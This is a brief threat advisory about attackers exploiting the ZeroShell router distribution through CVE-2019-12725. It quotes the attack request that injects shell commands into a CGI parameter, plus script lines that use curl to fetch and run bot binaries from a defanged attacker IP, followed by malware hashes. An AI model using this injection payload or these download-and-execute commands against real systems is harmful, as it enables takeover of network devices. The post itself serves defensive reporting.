APT’s Exploit Linux ‘ZeroShell’
Over the past 2 weeks researchers and organizations have seen an increase of exploit attempts against the ZeroShell software. “ZeroShell is a Linux based distribution dedicated to the implementation of Router and Firewall Appliances completely administrable via web interface.” The attackers are leveraging a Remote Code Execution vulnerability (CVE-2019-12725) to bypass authentication and run commands directly on the host, allowing for full compromise. The vulnerability is possible due to improper sanitation of parameters in an HTTP GET command.
The attack starts with a custom GET command to the vulnerable host, which makes use of certain parameters to bypass the authentication, and then supplies the operating system command. Attackers use native commands to download the first shell script and run it, which then downloads and installs additional files.
- Stage 1 – Use the custom GET command to download a shell script and run it.
- ‘GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*”;cd /tmp;curl -O hxxp://5.206.227[.]228/zero;sh zero;“
- Contents of zero
- cd /tmp
- curl -O hxxp://5.206.227[.]228/bot.x86_64; chmod 777 bot.x86_64; ./bot.x86_64
- curl -O hxxp://5.206.227[.]228/bot.x86; chmod 777 bot.x86; ./bot.x86
- Contents of zero
- ‘GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*”;cd /tmp;curl -O hxxp://5.206.227[.]228/zero;sh zero;“
- Stage 2 – Download additional malicious files and infect the system
- bot.x86 ebfa0aa59700e61bcf064fd439fb18b030237f14f286c6587981af1e68a8e477
- bot.x86_64 6027d9ec503f69dbb58560a63e6acd62d7ab93f36bf8f676d282394a0e55be95
- bot.arm5 ea0bd1002078bb304b20d8ce5c475b622c0b13656bee37841a65d19c59223259
- bot.arm6 64814ee2f5a98b9ae96b58cf6d9dc08fe12460070bd55ca8d7e138f9765fcffb
- bot.arm7 e077670ff29678f0b10875dc9be0603d9a65c402b9aae48b793e6f041140a9bd
These additional files have been analyzed and detected through VirusTotal as Backdoors/Trojans
Currently the attacks are not being attributed to any particular APT group. The vulnerability has been well documented and ZeroShell has released updates to address this flaw and correct it.
Sources: